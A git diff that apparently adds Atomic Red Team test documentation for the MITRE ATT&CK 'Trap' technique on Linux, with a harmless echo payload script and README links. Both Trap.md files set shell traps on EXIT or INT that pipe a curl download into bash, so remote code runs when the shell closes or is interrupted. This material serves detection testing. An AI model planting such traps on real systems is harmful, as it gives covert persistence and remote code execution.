diff --git a/Linux/Execution/Trap.md b/Linux/Execution/Trap.md new file mode 100644 index 00000000..a3f0c63e --- /dev/null +++ b/Linux/Execution/Trap.md @@ -0,0 +1,14 @@ +# Trap + +MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154) + + + trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT + + exit + +After exiting the shell, the script will download and execute. + + trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' INT + +After sending a keyboard interrupt (CTRL+C) the script will download and execute. \ No newline at end of file diff --git a/Linux/Payloads/echo-art-fish.sh b/Linux/Payloads/echo-art-fish.sh new file mode 100644 index 00000000..15e6e8d0 --- /dev/null +++ b/Linux/Payloads/echo-art-fish.sh @@ -0,0 +1,2 @@ +#! /bin/bash +echo So long, and thanks for all the fish! > /tmp/art-fish.txt \ No newline at end of file diff --git a/Linux/Persistence/Trap.md b/Linux/Persistence/Trap.md new file mode 100644 index 00000000..cc3a46f4 --- /dev/null +++ b/Linux/Persistence/Trap.md @@ -0,0 +1,10 @@ +# Trap + +MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154) + + + trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT + + exit + +After exiting the shell, the script will download and execute. \ No newline at end of file diff --git a/Linux/README.md b/Linux/README.md index e5ac516b..68be5681 100644 --- a/Linux/README.md +++ b/Linux/README.md @@ -8,7 +8,7 @@ | Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | | Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data from Local System | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | | Redundant Access | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | -| Trap | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | Trap | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Trap](Persistence/Trap.md) | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | | Valid Accounts | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels | | Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels | | | | Install Root Certificate | | System Owner/User Discovery | | | | | Multiband Communication |